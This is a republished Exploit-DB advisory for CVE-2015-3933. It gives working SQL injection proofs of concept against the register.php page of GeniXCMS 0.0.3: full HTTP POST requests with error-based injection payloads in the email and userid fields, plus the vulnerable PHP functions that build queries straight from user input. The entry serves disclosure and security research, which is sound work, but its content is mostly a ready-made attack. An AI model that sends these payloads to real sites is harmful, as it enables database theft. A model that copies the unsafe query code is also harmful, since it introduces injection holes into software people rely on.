GeniXCMS 0.0.3 – register.php SQL Injection Vulnerabilities

Posted on Posted in Exploit
EDB-ID: 37363 CVE: 2015-3933 OSVDB-ID: N/A
Verified: YES Author: cfreer Published: 2015-06-24
Download Exploit: Source Download Vulnerable App:
# Exploit Title: Genixcms register.php multiple SQL vuln
# Date: 2015-06-23
# Exploit Author: cfreer (poc-lab)
# Vendor Homepage:  http://www.genixcms.org
# Software Link: https://codeload.github.com/semplon/GeniXCMS/zip/master/GeniXCMS-master.zip
# Version: 0.0.3
# Tested on: Apache/2.4.7 (Win32) 
# CVE : CVE-2015-3933
 
 
=====================
SOFTWARE DESCRIPTION
=====================
 
Free and Opensource Content Management System, a new approach of simple and lightweight CMS. Get a new experience of a fast and easy to modify CMS.
 
=============================
VULNERABILITY: SQL Injection
=============================
 
 
 
Poc:
 
1、Genixcms register.php email SQL vuln
 
HTTP Data Stream
 
POST /genixcms/register.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ; PHPSESSID=r7o8e5rghc0n0j09i6drb4m9v6; GeniXCMS=8fq1peiv9lahvq3d1qlfab7g47
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 199
 
email='and(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'&pass1=cfreer&pass2=cfreer&register=1&token=&userid=poc-lab
 
 
 
 
\inc\lib\User.class.php
 
 
public static function is_email($vars){
    if(isset($_GET['act']) && $_GET['act'] == 'edit'){
        $where = "AND `id` != '{$_GET['id']}' ";
    }else{
        $where = '';
    }
    $e = Db::result("SELECT * FROM `user` WHERE `email` = '{$vars}' {$where}");
    if(Db::$num_rows > 0){
        return false;
    }else{
        return true;
    }
}
 
 
 
==============================================================================================================================================
2、Genixcms register.php userid SQL vuln
 
HTTP Data Stream
 
POST /genixcms/register.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ; PHPSESSID=r7o8e5rghc0n0j09i6drb4m9v6; GeniXCMS=8fq1peiv9lahvq3d1qlfab7g47
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 224
 
 
email=websec@poc-lab.org&pass1=poc-lab.org&pass2=poc-lab.org&register=1&token=&userid='and(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'
 
 
\inc\lib\User.class.php
 
public static function is_exist($user) {
if(isset($_GET['act']) && $_GET['act'] == 'edit'){
    $where = "AND `id` != '{$_GET['id']}' ";
    }else{
        $where = '';
    }
    $usr = Db::result("SELECT `userid` FROM `user` WHERE `userid` = '{$user}' {$where} ");
    $n = Db::$num_rows;
    if($n > 0 ){
        return false;
    }else{
        return true;
    }
 
}

Quelle: Exploit-db

Facebooktwittergoogle_plus